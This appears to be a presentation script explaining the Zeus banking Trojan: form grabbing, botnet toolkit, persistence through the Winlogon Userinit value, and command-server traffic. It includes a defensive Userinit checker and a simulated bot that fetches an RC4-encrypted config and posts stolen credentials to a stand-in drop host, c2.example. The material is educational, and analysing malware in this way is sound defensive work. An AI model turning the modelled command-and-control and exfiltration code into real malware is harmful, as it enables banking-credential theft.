Zeus, also known as Zbot, is famous for stealing banking information by using man-in-the-browser keystroke logging and form grabbing.
It is essentially a proxy Trojan horse that uses man-in-the-browser techniques to attack users. Rather than exploiting a vulnerability in the browser, it injects itself into the browser process and hooks the functions that send and receive web traffic, which lets it modify web pages and manipulate monetary transactions by changing or adding details before the user or the bank sees them.
Form grabbing is a technique for capturing web form data inside the browser, after the user has filled in the form and before the browser encrypts it for transmission, so HTTPS does not protect the submitted data; it works across the major browsers. Very recently the so-called "Happy Hacker" was arrested; he is alleged to be the mastermind behind the Zeus banking Trojan.
Change slide
* Zeus comes as a toolkit to build and administer a botnet. It has a control panel that is used to monitor the bots and push updates to them.
* It also has a so-called builder tool that creates the executables used to infect user computers.
* Zeus is sold as a commercial product: buyers in underground markets can easily set up their own botnet. It is estimated to cost around $700 or more for the advanced versions.
Change Slide
* Captures credentials over HTTP, HTTPS, FTP and POP3
* Has an integrated SOCKS proxy
* Steals or deletes HTTP and Flash cookies
* Captures screenshots and scrapes HTML from target sites
* Modifies the local hosts file
* Groups the infected systems into separate botnets to distribute command and control
* The control panel offers search over the collected data through a web form
* The configuration file is encrypted
* Has a "kill OS" command that renders the infected operating system unusable
* Has a unique bot identification string
Change Slide
Zeus is estimated to account for some 44% of banking malware infections and has impacted an estimated 3.6 million computers in the U.S. alone. Its victims include more than 960 different banks, with the latest reports indicating that it has infected almost 90% of Fortune 500 companies.
Zeus is estimated to have caused damages worth US$100 million since its inception. Alarmingly, up-to-date anti-virus programs block Zeus infections only 23 percent of the time. It is clear that signature-based anti-virus software alone cannot be relied on to combat Zeus. Companies need to look beyond the endpoint anti-virus product to protect customers from online fraud and to maintain customer goodwill.
Change Slide
Once the bot is executed, it copies itself to the locations shown on the slide (labelled "Trojan binary").
To be launched at every logon, it appends the path of the Trojan binary to the Userinit value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, so Winlogon starts it alongside the legitimate userinit.exe.
It then injects its code into the running winlogon.exe and svchost.exe processes (it does not modify those files on disk), so the malicious code runs under trusted process names.
As shown, the encrypted files the bot keeps beside its binary (local.ds, sysproc86.sys or audio.dll, depending on the variant) hold its local copy of the configuration, and the data stolen from the user, in the form of credentials, is written to a companion file in the same folder until it is uploaded.
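The Userinit trick above leaves a simple indicator: the value normally names only userinit.exe, so any additional comma-separated entry is worth investigating. The check below is an added example written for these notes, not Zeus code or a vendor tool; the sample registry values are constructed, and the file name trojan_binary.exe is a placeholder for whatever the slide labels "Trojan binary". On Windows the helper can read the live value through the standard winreg module; elsewhere it returns None and only the parser runs.

```python
"""Flag extra programs in the Winlogon Userinit value (added example, not Zeus code)."""
import re
from typing import List, Optional

# Winlogon launches every comma-separated entry in Userinit at logon. The only
# legitimate entry is userinit.exe, usually with its full System32 path.
LEGIT_USERINIT = re.compile(
    r"^(?:(?:[a-z]:\\windows|%systemroot%)\\system32\\)?userinit\.exe$", re.I
)

def parse_userinit(value: str) -> List[str]:
    """Split the raw Userinit string into its program entries, dropping blanks."""
    return [p.strip() for p in value.split(",") if p.strip()]

def suspicious_userinit_entries(value: str) -> List[str]:
    """Return every Userinit entry that is not the legitimate userinit.exe.

    An appended path (e.g. the bot's copy of itself) shows up here; a wiped or
    replaced userinit.exe entry would show up as the replacement program.
    """
    return [p for p in parse_userinit(value) if not LEGIT_USERINIT.match(p)]

def read_live_userinit() -> Optional[str]:
    """Read the real value on Windows; return None on other platforms."""
    try:
        import winreg  # only available on Windows
    except ImportError:
        return None
    key_path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
        return winreg.QueryValueEx(key, "Userinit")[0]

# Constructed sample values: a clean machine and one with an appended bot path.
CLEAN_VALUE = r"C:\Windows\system32\userinit.exe,"
INFECTED_VALUE = r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\trojan_binary.exe,"

if __name__ == "__main__":
    live = read_live_userinit()
    for label, value in (("clean", CLEAN_VALUE), ("infected", INFECTED_VALUE), ("live", live)):
        if value is None:
            continue
        extra = suspicious_userinit_entries(value)
        print(f"{label}: {'SUSPICIOUS ' + str(extra) if extra else 'ok'}")
```

The regex deliberately accepts only userinit.exe itself; it does not try to whitelist other "known good" programs, because nothing else belongs in this value on a standard Windows install.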
Change Slide
Once a client is infected, it communicates with the command server over HTTP. Its first job is to download the botnet's configuration file, which it requests with an HTTP GET; the configuration is what tells the bot which sites to target and where to send what it steals. The server replies with the encrypted configuration file, usually named config.bin. The bot decrypts it with the RC4 key that the builder embedded in the binary and then parses the configuration.
Once the configuration is loaded, the bot reports its public (gateway) IP address to the command server. Having joined the botnet, it starts posting the victim's private information to the drop address given in the configuration file, so all the financial information, credentials and screenshots are uploaded to that address, where the person running the botnet can use or sell them.
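The exchange just described, as an added in-process model written for these notes (it is not Zeus code and speaks to no real server): a stand-in command server hands out config.bin under RC4 and accepts encrypted reports at the gate URL; the bot fetches the config with a GET, decrypts and parses it, and POSTs a stolen record to url_server. RC4 with a build-time key is what Zeus 1.x and 2.x actually use for config.bin and the reports; the key, URLs, config lines and stolen record here are constructed, and the key=value layout is a simplification of the real binary config format (the field names url_loader, url_server and timer_config do come from the Zeus config.txt).

```python
"""Model of the Zeus config fetch and data upload (added example, not Zeus code)."""
from typing import Dict, List, Tuple

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:  # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

BOT_KEY = b"demo-key-embedded-at-build-time"  # constructed; stands in for the builder's key

CONFIG_TXT = b"""url_loader=http://c2.example/bot.exe
url_server=http://c2.example/gate.php
timer_config=60
"""  # constructed plaintext config; real config.bin is a binary structure

class C2Server:
    """Stands in for the command server: serves config.bin, accepts reports."""
    def __init__(self, key: bytes, config: bytes):
        self.key = key
        self.config = config
        self.reports: List[bytes] = []  # decrypted uploads

    def handle(self, method: str, url: str, body: bytes = b"") -> Tuple[int, bytes]:
        if method == "GET" and url.endswith("config.bin"):
            return 200, rc4(self.key, self.config)
        if method == "POST" and url.endswith("gate.php"):
            self.reports.append(rc4(self.key, body))
            return 200, b""
        return 404, b""

def parse_config(plain: bytes) -> Dict[str, str]:
    """Turn decrypted key=value lines into a dict; garbage from a wrong key yields no fields."""
    cfg: Dict[str, str] = {}
    for line in plain.decode("utf-8", errors="replace").splitlines():
        if "=" in line:
            k, v = line.split("=", 1)
            cfg[k.strip()] = v.strip()
    return cfg

def bot_checkin(server: C2Server, key: bytes, stolen: Dict[str, str]) -> Dict[str, str]:
    """GET config.bin, decrypt and parse it, then POST an encrypted report to url_server."""
    status, enc = server.handle("GET", "http://c2.example/config.bin")
    if status != 200:
        raise RuntimeError("configuration download failed")
    cfg = parse_config(rc4(key, enc))
    report = "\n".join(f"{k}={v}" for k, v in stolen.items()).encode()
    server.handle("POST", cfg["url_server"], rc4(key, report))
    return cfg

if __name__ == "__main__":
    srv = C2Server(BOT_KEY, CONFIG_TXT)
    # Constructed "form grab" record; a real report carries the captured POST body.
    cfg = bot_checkin(srv, BOT_KEY, {"url": "https://bank.example/login", "user": "alice"})
    print("drop address:", cfg["url_server"])
    print("server received:", srv.reports[0].decode())
```

Two things the model makes visible that the slide does not: the bot needs no secret from the server because the key is already in the binary, which is why recovering the key from an unpacked sample lets analysts decrypt both config.bin and the uploads; and the drop address comes from the config, not the binary, so the operator can move the collection server without re-infecting anyone.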
Change Slide
In summary, Zeus is famous for stealing banking information by using man-in-the-browser keystroke logging and form grabbing. Zeus comes as a toolkit to build and administer a botnet. It is estimated to account for some 44% of banking malware infections and has impacted an estimated 3.6 million computers in the U.S. alone, causing an estimated $100 million in damage. One of the criminals behind Zbot has been captured; the other is still at large today.